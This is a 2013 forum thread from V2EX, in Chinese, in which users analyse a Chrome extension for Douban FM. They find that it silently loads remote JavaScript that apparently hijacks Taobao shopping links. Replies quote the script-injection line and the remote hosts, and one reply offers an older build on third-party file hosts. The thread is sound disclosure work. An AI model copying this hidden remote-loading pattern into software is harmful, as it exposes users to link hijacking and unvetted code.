V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Get Google Chrome
Vimium · 在 Chrome 里使用 vim 快捷键
xinhugo
V2EX  ›  Chrome

Chrome扩展的安全性-质疑「豆瓣FM 精美版」要求过大的权限

  •  
  •   xinhugo · 2013-03-01 14:29:35 +08:00 · 6663 次点击
    这是一个创建于 4291 天前的主题,其中的信息可能已经有所发展或是发生改变。
    Chrome扩展「豆瓣FM 精美版」(https://chrome.google.com/webstore/detail/ofgppnjcdndocgicmodblmfmbdibefbm/)6.2.3_0与6.2.2_0相比,要求更大的权限。

    检查扩展代码,首先对比manifest.json,与上一版本不同,使用content_scripts字段,向页面注入js/inject.js脚本;据此检查js/inject.js,发现其引入远程JS(http://send2.eg300.com/js/doubanfmjmb/extension.js)。

    尝试下载该JS,但没有成功,也没有找到该域名的信息。

    此信息并不意味着笔者认为该扩展有恶意行为,但无论如何应谨慎安装非Google出品的Chrome浏览器扩展。

    推荐阅读:谷奥-不可忽视的 Chrome 扩展安全性:http://www.guao.hk/posts/about-chrome-extension-security.html
    17 条回复    1970-01-01 08:00:00 +08:00
    Mutoo
        1
    Mutoo  
       2013-03-01 14:51:16 +08:00   ❤️ 1
    这种非官方的个人扩展本来就需要小心的。不如直接选用域名限制在douban.fm下的userscripts。
    feiandxs
        2
    feiandxs  
       2013-03-01 15:08:49 +08:00
    豆瓣FM 精美版 …… 名字带XX版(诸如绿色版,优化版,纯净版,无极版)的基本都不是什么好东西。
    至少给自己的软件起类似名字的作者的品位都很低级。
    xinhugo
        3
    xinhugo  
    OP
       2013-03-01 15:23:48 +08:00   ❤️ 1
    @Mutoo 请问你是如何使用userscripts的呢?是直接拖到Chrome扩展程序页面安装,还是使用第三方扩展(例如,Tampermonkey)进行管理呢?

    自Chrome稳定版升级到V25,Tampermonkey启用的情况下,打开Evernote网页版,标签就崩溃。
    xinhugo
        4
    xinhugo  
    OP
       2013-03-01 15:30:54 +08:00
    @feiandxs 非官方出品的各种XX版,还真要看作者的人品的。
    caomu
        5
    caomu  
       2013-03-01 16:11:04 +08:00   ❤️ 2
    嗯,像这种权限不明的扩展,如果我真的要用(例如一个“您在所有网站上的数据、您的标签页和浏览活动”的天气扩展),我就自己下crx,改掉代码然后再打包自用。
    xinhugo
        6
    xinhugo  
    OP
       2013-03-01 18:58:50 +08:00
    @caomu 嗯嗯,对于比价扩展,我也这么干过。但因为学生党,资金有限,不常网购,安装在平常用来测试的Chrome金丝雀版上算了。

    你尝试过不重新打包情况下,直接修改 \User Data\Default\Preferences 相应扩展的权限吗?
    caomu
        7
    caomu  
       2013-03-01 20:48:12 +08:00
    @xinhugo 唔,没试过这种play呢。
    greatghoul
        8
    greatghoul  
       2013-03-08 14:24:58 +08:00
    这个作者的易词典也有这样的问题。
    https://chrome.google.com/webstore/detail/易词典/njeebknkghnjbobnghdlfgfaigkjciih

    有没有 Chrome 里面类似于安全卫士的扩展呢?能够查这样扩展的?
    xinhugo
        9
    xinhugo  
    OP
       2013-03-17 20:24:38 +08:00
    @greatghoul 「这样的问题」指的是权限,还是引入可疑远程JS?

    词典扩展要实现屏幕取词,需要「您在所有网站上的数据」可以理解。不放心的话,可以试试Google Dictionary (by Google)

    https://chrome.google.com/webstore/detail/google-dictionary-by-goog/mgijmajocgfcbeboacabfgobmjgjcoja/details
    dowhat
        10
    dowhat  
       2013-03-17 20:39:33 +08:00
    啊哦,您没有任何扩展程序 :-( 要改为浏览该程序库吗?

    我发现自己竟然一个扩展都没装……
    swulling
        11
    swulling  
       2013-03-17 20:42:28 +08:00
    这个地址能访问啊
    http://send2.eg300.com/js/doubanfmjmb/extension.js
    会再head里塞这个 s.src="http://send2.eg300.com/js/extension.min.js";

    整理下:https://gist.github.com/ninehills/5181343

    可以看是劫持taobao/tmail地址
    swulling
        12
    swulling  
       2013-03-17 20:55:29 +08:00
    号召去chrome商店里面report abuse,国人的东西真心不靠谱
    shiny
        13
    shiny  
       2013-03-17 21:14:04 +08:00
    swulling
        14
    swulling  
       2013-03-17 21:50:24 +08:00
    @shiny 这人干事好光明正大啊,连注入外部js都要起个inject.js的文件名,哈哈
    greatghoul
        15
    greatghoul  
       2013-03-18 14:31:10 +08:00
    @greatghoul http://a1.eg300.com/js/extension.min.js

    inject.js 中先入了一个外部脚本,然后脚本中又动态了入了一个 extensin.min.js 的东东。虽然是压缩过了,但依然能看出是和淘宝有关的。

    我没有细看代码,虽然不一定作者在做恶,但这样隐晦的载入,大概也不是什么见得光的事。

    所以还是劝大家少用了,虽然我也不上淘宝什么的,但还是有种被爆菊花的感觉。

    不过还是感谢作者开发出易词典这样好用的词典扩展,真的很好用。
    wenchao
        16
    wenchao  
       2013-03-28 00:47:42 +08:00
    看商店的最新评论,确实好多人都有这个劫持淘宝的问题。我找到一个 豆瓣FM 精美版 5.4.8 版本的,就是歌词功能貌似不可以了,其它功能都能用。http://pan.baidu.com/share/link?shareid=380685&uk=356416 这个权限就少多了,只要豆瓣fm和百度听*(估计是歌词)的权限。
    wenchao
        17
    wenchao  
       2013-03-28 00:53:32 +08:00
    @wenchao 审核失败,我真是服气了。http://www.kuaipan.cn/file/id_2459963993620613.htm 还是金山好啊。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2931 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 36ms · UTC 03:30 · PVG 11:30 · LAX 19:30 · JFK 22:30
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.